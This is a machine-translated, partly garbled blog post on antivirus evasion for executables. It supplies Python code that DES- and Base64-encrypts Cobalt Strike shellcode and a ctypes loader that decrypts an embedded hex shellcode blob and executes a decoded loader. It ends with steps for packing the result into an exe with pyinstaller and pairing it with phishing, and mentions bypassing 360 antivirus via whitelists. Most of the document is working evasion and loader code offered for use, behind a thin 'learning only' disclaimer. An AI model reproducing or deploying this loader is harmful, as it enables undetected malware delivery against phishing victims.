Discussion on killing free exe Technology

Preface ：

This article is only for infiltration and communication learning , Due to the spread of 、 Any direct or indirect consequences and losses caused by using the information provided in this article , All by the user's own responsibility , The author of this article is not responsible for this

Recently, I analyzed most of the language tricks
c Of python Of rust Of go Some of the common languages on the market have been studied and written about their own find python It is indeed the simplest , But in fact, if you don't kill in depth Still need process injection ring0 Layer to fight against killing soft , Otherwise, it's too simple to be static After all, some behaviors will still be dynamic killing
This article shares one python . See the text for the effect There are also all over But now I'm sure I won't send it

Text ：

At the very beginning

The changed
principle ： The core is still right shellcode and loader Encrypt Of course, separation is certainly possible, but in order to prevent traceability, I think this is actually ok
DES+Base64
shellcode encryption

import binascii 
from pyDes import des, CBC, PAD_PKCS5 
#  Need to install  pip install pyDes 
 
def des_encrypt(secret_key, s): 
    iv = secret_key 
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) 
    en = k.encrypt(s, padmode=PAD_PKCS5) 
    return binascii.b2a_hex(en) 
 
def des_decrypt(secret_key, s): 
    iv = secret_key 
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) 
    de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5) 
    return de 
 
secret_str = des_encrypt('12345678', 'I love YOU~') 
print(secret_str) 
clear_str = des_decrypt('12345678', secret_str) 
print(clear_str) 

loader loader

# -*- coding:utf-8 -*-
import ctypes
import base64
import binascii 
from pyDes import des, CBC, PAD_PKCS5 

def des_decrypt(secret_key, s): 
    iv = secret_key 
    k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) 
    de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5) 
    return de
    
if __name__ == '__main__':
    shell_code =des_decrypt('12345678','') 
    shell_code=str(shell_code,encoding='utf-8')
    shellcode1=base64.b64decode(shell_code)
    shellcode=shellcode1.decode().replace('&','c4d8686d9fcabdc94c0fc30b4dfe35c96c70ec9c5bbe538f268cc9c826e27dea25de33d121bf553843593aac8ef0f08b50d70de08efa8c21448256e8e1297726919f6ad3a85a046a7517fc95399626c78a5c2d78b901bf396f348eda70e532e42ec9bfb8e5f13456e745614483a737ab16776061538df48eb82a54c5f9112b76b88b67bf2d960f29ae39cf5a62bc59520d5e364447dd29aa5d8484cc3a102bf4ee3ff2e8375756615e385d5b29113e4e8a5e3d2cd66dfc67a4deb0e38d5908cd498435484b09a0eafbafb8165352fa6bfa4b8fd58ef932c0c7777842b641fc05071302ba1172c6a427f78038cb3eec555a75ecc3c46699edbd0b27466ffd5590eef70d079046b72a6ba260b173d63efd2e12f3691f27061c4942a722b019c44634b93c296611c7ddf1ffabee8daa8d50500ba19ec05aa9ce2b703ec1eecde089142c4022489adc4c816480ac57ebc4b26178ea75d47a48a99ac1b7dc4b9553a47aeff63e9e7fc20be4a785ecaba59a57ea9316b32023bb512464eca5400ed0d0f5822052d263226bdf703bd5422bf914d6770751c6af62c3ee69d02deea7e0caa50f28a0ec6d840df7be10b2c70ab6b29ad40b660478dddbf0c3f453b755a510dc56772c9dccfb6a3a7abf183ec41d389045b260b9bc619c626b6dcdeb388b23d1cf372e3c7262c1d1688820d9738296536e0ea46d38d6979b250661a572335abfd79a23c86b250510f2c8a82660bfa47f855ec0a3c8c809598314acb06fdc6870a7cbfd38fd64023b374b750f1b7888d632b9cfa2b577718931254bd63fa1d7f0de341b02e631fc871b202e2fb426b0d7716ace7bdd44bc6b7753102e379188dabae27534fe37312f765b6895a03146b01320e30cd2ae62e9330d6312da137fc34ee2210f8dadbcd7b20e9de224d6511f726906a8e28c2b05b6154f44c3d918')
    shellcode = bytes.fromhex(str(shellcode))
    loader =des_decrypt('12345678','')     
    loader=str(loader,encoding='utf-8')
    loader1=base64.b64decode(loader)
    loader2=loader1.decode().replace('&','')
    exec(loader2)

vt Incomplete

Usage method
1.cs Go whole shellcode Come down

2. Process generated shellcode
take \x Replace empty

Get the following

3. Take the one above base64 encryption

4. Take what you get base64 Conduct aes Encrypted to get aes Encrypted

5. Throw this number into loader Go inside

6. Compile to exe
pyinstaller -F cs.py
Click go online The combination of fishing techniques can be perfect

The command execution is the same

Of course, high-risk actions must be 360 This is the characteristic of this kind of exemption If you want to bypass, just use a special white list and corresponding methods to implement